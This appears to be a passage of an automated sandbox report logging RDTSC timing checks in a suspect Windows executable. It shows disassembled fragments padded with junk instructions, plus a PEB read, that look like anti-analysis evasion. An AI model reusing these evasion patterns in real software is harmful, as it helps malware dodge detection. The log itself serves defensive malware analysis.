Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 115AA37 second address: 115AA69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147ABFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FE80147AC24h 0x0000000f jmp 00007FE80147AC06h 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007FE80147ABF6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 115AA69 second address: 115AA6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 115AA6D second address: 115AA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1163480 second address: 1163492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 jmp 00007FE80149857Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1163492 second address: 116349F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 je 00007FE80147AC02h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 116349F second address: 11634A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1162B72 second address: 1162B85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147ABFBh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1163189 second address: 116318D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 116318D second address: 1163199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1163199 second address: 116319D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 116319D second address: 11631A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11631A1 second address: 11631A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11631A7 second address: 11631AC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11631AC second address: 11631B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11631B2 second address: 11631D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jg 00007FE80147ABF6h 0x0000000c jc 00007FE80147ABF6h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 jnp 00007FE80147ABF6h 0x0000001d push edx 0x0000001e pop edx 0x0000001f push esi 0x00000020 pop esi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11673B7 second address: 11673BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 116795C second address: 1167960 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1167960 second address: 116796C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1167C2B second address: 1167C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jc 00007FE80147ABF6h 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FE80147ABFBh 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1173197 second address: 117319B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 117319B second address: 11731B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FE80147ABFBh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1173795 second address: 11737A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FE801498576h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11737A5 second address: 11737B7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE80147ABF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11737B7 second address: 11737BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11737BC second address: 11737FD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE80147AC27h 0x00000008 je 00007FE80147AC11h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 117393B second address: 1173941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1173941 second address: 1173945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1173A6F second address: 1173A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE80149857Eh 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1173A86 second address: 1173A98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE80147ABFEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1173BE3 second address: 1173C07 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE801498576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FE801498581h 0x00000010 jng 00007FE801498576h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1173EAC second address: 1173EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1173EB0 second address: 1173EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1174053 second address: 1174057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1174EA6 second address: 1174EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FE801498576h 0x0000000a popad 0x0000000b jnl 00007FE80149857Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1174EBD second address: 1174EC2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1172D71 second address: 1172D81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FE801498576h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1172D81 second address: 1172D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11886B1 second address: 11886B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11886B9 second address: 11886BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1188130 second address: 1188140 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80149857Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11882B3 second address: 11882D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147ABFAh 0x00000007 jne 00007FE80147ABF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007FE80147ABFAh 0x00000015 pushad 0x00000016 popad 0x00000017 push edi 0x00000018 pop edi 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11882D4 second address: 11882F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE801498584h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 118FAAB second address: 118FAB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FE80147ABF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 118FAB6 second address: 118FABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 119C70A second address: 119C716 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE80147ABFEh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 119C716 second address: 119C735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FE80149857Fh 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11A2296 second address: 11A229E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11A20EC second address: 11A2103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jp 00007FE801498582h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11A2103 second address: 11A2120 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FE80147ABF6h 0x00000009 jmp 00007FE80147AC02h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11A7CAE second address: 11A7CC2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE801498578h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FE801498576h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11A7CC2 second address: 11A7CC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11A7CC6 second address: 11A7CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE80149857Ch 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11A7CE0 second address: 11A7CE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11A7CE4 second address: 11A7CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11A7CEA second address: 11A7D06 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FE80147AC03h 0x00000008 pop edi 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11A6E67 second address: 11A6E77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FE80149857Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11A6FC1 second address: 11A6FC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11A6FC7 second address: 11A6FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE801498582h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11A79BA second address: 11A79BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11A79BE second address: 11A79CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11A79CA second address: 11A79CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11A79CE second address: 11A79D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11AF0DD second address: 11AF0E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11AEF42 second address: 11AEF4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE801498576h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11E9F3B second address: 11E9F3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11E9F3F second address: 11E9F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007FE80149857Bh 0x0000000e jno 00007FE801498576h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11E9F5B second address: 11E9F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FE80147AC0Fh 0x0000000b jmp 00007FE80147AC07h 0x00000010 push edx 0x00000011 pop edx 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11FA3A0 second address: 11FA3A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11FA3A4 second address: 11FA3D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FE80147AC04h 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE80147AC04h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11FA20C second address: 11FA210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11FA210 second address: 11FA259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE80147AC01h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FE80147AC04h 0x00000011 jne 00007FE80147ABF6h 0x00000017 pop eax 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FE80147AC03h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11FBAA0 second address: 11FBACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 je 00007FE801498576h 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FE801498589h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11FDAA6 second address: 11FDAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FE80147AC02h 0x0000000b jng 00007FE80147ABF6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11FDAB9 second address: 11FDABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11FDABD second address: 11FDAC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11FD777 second address: 11FD77D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 12C389C second address: 12C38C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147ABFAh 0x00000007 jmp 00007FE80147AC09h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 12C38C9 second address: 12C38DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE80149857Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 12C296A second address: 12C296E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 12C296E second address: 12C298D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jc 00007FE801498576h 0x00000010 push edx 0x00000011 pop edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 jo 00007FE801498576h 0x0000001e pop edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 12C298D second address: 12C2997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FE80147ABF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 12C2D62 second address: 12C2D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 12C316F second address: 12C3190 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FE80147ABF6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jne 00007FE80147ABF6h 0x00000018 popad 0x00000019 jg 00007FE80147ABFCh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 12C340C second address: 12C3412 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 12C3412 second address: 12C3418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 12C3418 second address: 12C3421 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 12C3421 second address: 12C3427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 12C4FDF second address: 12C4FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE80149857Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 12C7AF5 second address: 12C7AFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA004E second address: 6DA0054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0054 second address: 6DA0058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0058 second address: 6DA00A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FE801498586h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 pushad 0x00000011 mov cl, 81h 0x00000013 mov eax, ebx 0x00000015 popad 0x00000016 jmp 00007FE801498585h 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov edi, 5343359Eh 0x00000026 movsx ebx, ax 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA00A3 second address: 6DA00C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA00C2 second address: 6DA00FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FE801498586h 0x0000000a popad 0x0000000b sub esp, 18h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE801498587h 0x00000015 rdtsc
